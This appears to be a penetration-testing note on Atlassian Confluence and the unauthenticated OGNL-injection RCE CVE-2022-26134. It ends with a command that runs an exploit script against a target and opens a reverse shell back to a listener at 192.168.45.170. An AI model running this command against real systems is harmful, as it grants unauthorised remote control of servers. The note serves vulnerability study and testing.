Atlassian Confluence

Atlassian Confluence is a widely used web-based collaboration platform that allows teams to create, share, and manage documentation and internal knowledge bases. It supports on-premise installations through Confluence Server and scalable deployments with Confluence Data Center.

Unauthenticated RCE

Confluence Server and Data Center versions from 1.3.0 up to (but not including) 7.4.17, as well as specific version ranges between 7.13.0 and 7.18.1 are vulnerable to an unauthenticated RCE flaw (CVE-2022-26134). When a vulnerable Confluence endpoint receives a maliciously crafted HTTP request containing a specially constructed Object-Graph Navigation Language (OGNL) payload, the server evaluates it as code. This grants the attacker full control over the underlying OS, allowing arbitrary command execution with the privileges of the Confluence service. A working PoC is available.

python3 through_the_wire.py --rhost <target-IP> --rport 8090 --lhost 192.168.45.170 --lport 80 --reverse-shell --protocol http://